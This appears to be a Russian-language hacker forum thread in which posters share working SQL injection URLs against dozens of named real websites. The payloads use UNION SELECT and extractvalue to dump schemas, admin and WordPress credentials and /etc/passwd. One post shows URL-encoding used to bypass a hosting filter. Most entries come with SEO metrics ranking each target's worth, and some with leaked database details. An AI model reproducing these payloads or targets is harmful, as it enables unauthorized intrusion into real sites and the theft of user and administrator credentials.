Небольшая подборка. PHP: http://www.conciergequestionnaire.com/ur_here/story.php?id=-196+union+select+concat_ws(0x03a,table_schema,table_name,column_name),2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns -- PHP: http://www.gumblossombabies.com/item.php?itemid=-1+union+select+1,2,3,4,5,load_file('/etc/passwd'),7-- PHP: http://qiyuangh.g.178.com/main.php?act=charactorlist&user_id=1+and+extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1))) PHP: https://www.nensa.net/calendar/index.html?id=-1252+union+select+1,2,concat_ws(0x03a,ID,user_login,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+nensa_forum.wp_users-- PHP: http://pazoogle.com/grafton-hills/Admin/getFile.php?db=sites&table=siteMediaFiles&fileId=-411'+/*!union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13*/--+h
Скулю 10 года пофиксили, но нарастили пузомерки и открыли новые доступы (= Яндекс тИЦ: 100 Page Rank: 4 Яндекс Каталог: True PHP: http://www.magniflex.ru/shop/checkout2.php?id=3+AND+extractvalue(1,user())+--+
SQL 4.1.22 => таблицы подбираем Code: http://tvpc.com/Channel.php?ChannelID=1+UNION+SELECT+1,2,ChannelID,4,5,ChannelPassword,7,version(),9+from+Channels+LIMIT+0,1
Таблицы: Code: http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES+-- Колонки: Code: http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x...+--
20к траффика http://www.zavarka.ru/texts/cgi-bin/show.cgi?id=1+union+select+1,version(),3,4,5,6,7,8+--+ админка /admin/admin.php
http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c%33%2d%2d%20%31 pеtеrhost обходится полным urlencode запроса http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61%2c%75%73%65%72%6e%61%6d%65%2c%75%73%65%72%5f%70%61%73%73%77%6f%72%64%29%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c%33%20%66%72%6f%6d%20%70%68%70%62%62%5f%75%73%65%72%73%20%6c%69%6d%69%74%20%31%2c%31%2d%2d%20%31
PHP: http://www.revistaklan.com/material.php?id=-1074%27+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17--+f ТИЦ-10(R2) PR-5 AR-811,760DMOZ
Интернет магазин техники - NewComp. Админы были поставлены в известность, но никакой реакции. Login: Code: http://new comp.dp.ua/ ?d=-1+union+select+login+fr om+users+--+ Password: Code: http://new comp.dp.ua/ ?d=-1+union+select+password+fr om+users+--+
PR == 6; ТИЦ == 1200; DMOZ, ЯK == true; PHP: http://www.mi.ras.ru/index.php?l=1&c=1'+union+select+1,2,3,4,load_file('/etc/passwd')--+h PR == 2; PHP: http://www.ibanklive.com/index.php?page=contact_us_existing_03&mode=contact&ticket_id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6 -- TИЦ && PR == N/A; PHP: http://video.newlifechurch.org/podcast/index.php?pid=-11+union+select+1,file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user -- http://video.newlifechurch.org/info.php
Асток-Пресс. Санкт-Петербургская рекламно-информационная газета. Code: http://astok-press.ru/index.php?section=news.php&news_id=1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8-- Database Version: 5.1.51-community-log Database name: tmp_astok User name: tmp_astok@localhost ТИЦ: 240 PR: 4 Авторский сайт Соболевой Ольги. Методики обучения детей. Code: http://www.metodika.ru/bookitem.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12,13-- Вывод в title. Database Version: 5.0.51a-3ubuntu5 Database name: bi78 User name: bi78-sql@localhost ТИЦ: 300 PR: 4 Dead Hackers Society. Code: http://dhs.nu/news.php?t=single&ID=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- Database Version: 5.1.63-0+squeeze1 Database name: ae User name: ae@localhost ТИЦ: 0 PR: 4 Украинский женский сайт. Code: http://ladys.in.ua/index.php?page=4&cat=4&sled=800&enda=820&bl=1&num=1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())-- Database Version: 5.1.60 Database name: oleg_ladys User name: oleg_ladys@localhost ТИЦ: 0 PR: 0
Code: http://www.coorslightpr.com/event.php?id=-28+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- ТИЦ0 PR4 AR6,313,469
Slanger.ru — Словарь молодежного, компьютерного и другого сленга и жаргона http://slanger.ru/?mode=library&r_id=-9%20union%20select%201,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7-- 5.1.58-log slangerru@localhost slangerru pc-linux-gnu
PHP: http://www.aldeburghsuffolk.com/promotion.php?id=-14/**/union/**/select/**/1,2,3,4,5,6,7,concat_ws(user(),database(),version()),9-- PR2 [email protected] PHP: http://www.cherry-italy.com/en/promotion.php?page=&id=-34/**/union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15-- PR1 [email protected]
Code: http://www.buypc.ru/promo.php?id=-10/**/union/**/select/**/1,2,3,concat_ws(user(),database(),version()),5,6 Тиц 10 [email protected] Code: http://centralparkjakarta.com/v2/promo.php?st=5&id=-478%27+union+select+1,2,group_concat(admin_id,0x03a,username,0x03a,password),4,5,6,7,8+from+admin--+f PR5
PR == 6, ТиЦ == 0 Code: http://www.npvideo.com/channel.php?id=-1 '+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14+from+wp_users+--+ PR == 4, ТиЦ == 0 Code: http://www.yna.edu/5771_shabbaton.php?id=-1'+union+select+1,group_concat (column_name+separator+0x3a),3,4,5+from+information_schema.columns+where+table_name='users'+--+ PR == 4, ТиЦ == 0 Code: http://www.bostonhigashi.org/about.php?id=-1+union+select+1,2,concat_ws (0x3a3a,database(),version(),user())+--+ PR == 3, ТиЦ == 10 Code: http://av tech.uz/detailed?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,username,password),16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,1+--+ PR == 0, ТиЦ == 0 Code: http://www.neo group.uz/news.php?id=-6'+union+select+1,concat_ws(0x3a,log,pas5),3,4+from+administrators+--+
